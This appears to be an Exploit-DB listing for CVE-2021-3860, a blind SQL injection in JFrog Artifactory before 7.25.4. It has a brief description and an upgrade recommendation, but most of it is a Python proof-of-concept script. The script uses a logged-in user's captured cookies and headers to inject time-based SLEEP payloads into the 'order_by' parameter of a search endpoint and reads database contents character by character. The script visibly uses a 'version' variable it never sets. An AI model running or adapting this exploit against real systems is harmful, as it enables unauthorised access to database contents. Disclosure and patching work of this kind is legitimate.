header-logo
Suggest Exploit
vendor:
Artifactory
by:
ardr
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Artifactory
Affected Version From: Prior to 7.25.4
Affected Version To: 7.25.4
Patch Exists: YES
Related CWE: CVE-2021-3860
CPE: a:jfrog:artifactory
Metasploit:
Other Scripts:
Platforms Tested: MySQL
2021

Artifactory Low-Privileged Blind SQL Injection

The exploit allows an attacker to perform a blind SQL injection attack on JFrog Artifactory versions prior to 7.25.4. By sending crafted requests to the '/ui/api/v1/global-search/bundles/received' endpoint, an attacker can extract sensitive information from the database. This vulnerability is identified as CVE-2021-3860.

Mitigation:

To mitigate this vulnerability, it is recommended to update JFrog Artifactory to version 7.25.4 or later. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date: 
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below


warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint 
pos = 1
# cookies = Replace this with captured cookies from the above endpoint 


while True:
    for i in string.digits + '.':
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)